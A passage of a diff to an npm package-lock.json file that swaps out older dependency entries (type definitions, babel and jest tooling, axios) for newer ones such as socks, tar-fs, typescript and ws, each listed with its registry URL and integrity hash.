"end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.3.tgz", - "integrity": "sha512-sz7iLqvVUg1gIedBOvlkxPlc8/uVzyS5OwGz1cKjXzkl3FpL3al0crU8YGU1WoHkxn0Wxbw5tyi6hvzJKNzFsw==", + "node_modules/react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", + "dev": true, + "license": "MIT" + }, + "node_modules/rfc4648": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", + "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==", "dev": true }, - "node_modules/@types/istanbul-lib-report": { + "node_modules/slash": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" + "engines": { + "node": ">=8" } }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" + "license": "MIT", + "engines": { + "node": ">= 6.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/@types/jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.4.0.tgz", - "integrity": "sha512-VaywcGQ9tPorCX/Jkkni7RWGFfI11whqzs8dvxF41P17Z+z872thvEvlIbznjPJ02kl1HMX3LmLOonsj2n7HeQ==", + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", "dev": true, + "license": "MIT", "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" + }, + "engines": { + "node": ">= 10.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/@types/js-yaml": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.2.tgz", - "integrity": "sha512-KbeHS/Y4R+k+5sWXEYzAZKuB1yQlZtEghuhRxrVRLaqhtoG5+26JwQsa4HyS3AWX8v1Uwukma5HheduUDskasA==" - }, - "node_modules/@types/lodash": { - "version": "4.14.172", - "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.172.tgz", - "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", - "dev": true - }, - "node_modules/@types/mustache": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", - "integrity": "sha512-c4OVMMcyodKQ9dpwBwh3ofK9P6U9ZktKU9S+p33UqwMNN1vlv2P0zJZUScTshnx7OEoIIRcCFNQ904sYxZz8kg==", - "dev": true - }, - "node_modules/@types/node": { - "version": "16.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-16.11.19.tgz", - "integrity": "sha512-BPAcfDPoHlRQNKktbsbnpACGdypPFBuX4xQlsWDE7B8XXcfII+SpOLay3/qZmCLb39kV5S1RTYwXdkx2lwLYng==" - }, - "node_modules/@types/nodemailer": { - "version": "6.4.4", - "resolved": "https://registry.npmjs.org/@types/nodemailer/-/nodemailer-6.4.4.tgz", - "integrity": "sha512-Ksw4t7iliXeYGvIQcSIgWQ5BLuC/mljIEbjf615svhZL10PE9t+ei8O9gDaD3FPCasUJn9KTLwz2JFJyiiyuqw==", + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", "dev": true, + "license": "MIT", "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/nunjucks": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/@types/nunjucks/-/nunjucks-3.1.5.tgz", - "integrity": "sha512-0zEdmQNNvQ+xyV9kqQvAV93UVroTwhE78toVUDT0GBnGcW2jQBZnB4al9qq2LqI5qHOqROy/DvvAY/UwrbvV1A==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.2", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.2.tgz", - "integrity": "sha512-KufADq8uQqo1pYKVIYzfKbJfBAc0sOeXqGbFaSpv8MRmC/zXgowNZmFcbngndGk922QDmOASEXUZCaY48gs4cg==", - "dev": true - }, - "node_modules/@types/request": { - "version": "2.48.7", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.7.tgz", - "integrity": "sha512-GWP9AZW7foLd4YQxyFZDBepl0lPsWLMEXDZUjQ/c1gqVPDPECrRZyEzuhJdnPWioFCq3Tv0qoGpMD6U+ygd4ZA==", - "dependencies": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" + }, + "engines": { + "node": ">= 14" } }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/tough-cookie": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.1.tgz", - "integrity": "sha512-Y0K95ThC3esLEYD6ZuqNek29lNX2EM1qxV8y2FTLUB0ff5wWrk7az+mLrnNFUnaXcgKye22+sFBRXOgpPILZNg==" - }, - "node_modules/@types/ws": { - "version": "8.5.4", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.4.tgz", - "integrity": "sha512-zdQDHKUgcX/zBc4GrwsE/7dVdAD8JR4EuiAXiiUhhfyIJXXb2+PrGshFyeXWQPMmmZ2XxgaqclgpIC7eTXc1mg==", + "node_modules/stack-utils": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", + "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", + "dev": true, "dependencies": { - "@types/node": "*" + "escape-string-regexp": "^2.0.0" + }, + "engines": { + "node": ">=10" } }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", + "node_modules/stream-buffers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", "dev": true, - "dependencies": { - "@types/yargs-parser": "*" + "engines": { + "node": ">= 0.10.0" } }, - "node_modules/@types/yargs-parser": { - "version": "20.2.1", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", - "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", - "dev": true - }, - "node_modules/a-sync-waterfall": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/a-sync-waterfall/-/a-sync-waterfall-1.0.1.tgz", - "integrity": "sha512-RYTOHHdWipFUliRFMCS4X2Yn2X8M87V/OpSqWzKKOGhzqyUxzyVmhHDH9sAvG+ZuQf/TAOFsLCpMw09I1ufUnA==" - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "dev": true, + "license": "MIT", "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "optionalDependencies": { + "bare-events": "^2.2.0" } }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", "dev": true, "dependencies": { - "type-fest": "^0.21.3" + "has-flag": "^4.0.0" }, "engines": { "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "node_modules/tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", "dev": true, + "license": "MIT", "dependencies": { - "color-convert": "^2.0.1" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/anymatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.2.tgz", - "integrity": "sha512-P43ePfOAIupkguHUycrc4qJ9kz8ZiuOUijaETwX7THt0Y/GNK7v0aa8rY816xWjZ7rJdA5XdMcpVFTKMq+RvWg==", + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", "dev": true, + "license": "MIT", "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/asap": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", - "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" - }, - "node_modules/asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "node_modules/axios": { - "version": "1.6.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.0.tgz", - "integrity": "sha512-EZ1DYihju9pwVB+jg67ogm+Tmqc6JmhamRN6I4Zt8DfZu5lbcQGw3ozH9lFejSJgs/ibaef3A9PMXPLeefFGJg==", - "dependencies": { - "follow-redirects": "^1.15.0", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "node_modules/axios/node_modules/form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "dev": true, + "license": "Apache-2.0", "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 6" + "b4a": "^1.6.4" } }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" + "is-number": "^7.0.0" }, "engines": { - "node": ">=8" + "node": ">=8.0" } }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "license": "MIT" }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "node_modules/typescript": { + "version": "5.8.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.8.3.tgz", + "integrity": "sha512-p1diW6TqL9L07nNxvRMM7hMMw4c5XOo/1ibL4aAIGmSAt9slTE1Xgw5KWuof2uTOvCg9BY7ZRi+GaF+7sfgPeQ==", "dev": true, - "dependencies": { - "fill-range": "^7.1.1" + "license": "Apache-2.0", + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" }, "engines": { - "node": ">=8" + "node": ">=14.17" } }, - "node_modules/browserslist": { - "version": "4.16.7", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.16.7.tgz", - "integrity": "sha512-7I4qVwqZltJ7j37wObBe3SoTz+nS8APaNcrBOlgoirb6/HbEU2XxW/LpUDTCngM6iauwFqmRTuOMfyKnFGY5JA==", + "node_modules/undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", "dev": true, - "dependencies": { - "caniuse-lite": "^1.0.30001248", - "colorette": "^1.2.2", - "electron-to-chromium": "^1.3.793", - "escalade": "^3.1.1", - "node-releases": "^1.1.73" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - } + "license": "MIT" }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", "dev": true, - "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" - } + "license": "BSD-2-Clause" }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", "dev": true, + "license": "MIT", "dependencies": { - "node-int64": "^0.4.0" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", "dev": true }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", + "node_modules/ws": { + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001251", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001251.tgz", - "integrity": "sha512-HOe1r+9VkU4TFmnU70z+r7OLmtR+/chB1rdcJUeQlAinjEeb0cKL20tlAtOagNZhbrtLnCvV19B4FmF1rgzl6A==", - "dev": true, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - } - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" + "node": ">=10.0.0" }, - "engines": { - "node": ">=10" + "peerDependencies": { + "bufferutil": "^4.0.1", + "utf-8-validate": ">=5.0.2" }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" + "peerDependenciesMeta": { + "bufferutil": { + "optional": true + }, + "utf-8-validate": { + "optional": true + } } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", + } + }, + "dependencies": { + "@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, - "engines": { - "node": ">=10" + "requires": { + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" } }, - "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", - "engines": { - "node": ">=10" - } + "@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true }, - "node_modules/ci-info": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.2.0.tgz", - "integrity": "sha512-dVqRX7fLUm8J6FgHJ418XuIgDLZDkYcDFTeL6TA2gt5WlIZUQrrH6EZrNClwT/H0FateUsZkGIOPRrLbP+PR9A==", + "@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true }, - "node_modules/cjs-module-lexer": { - "version": "1.2.2", - "resolved": 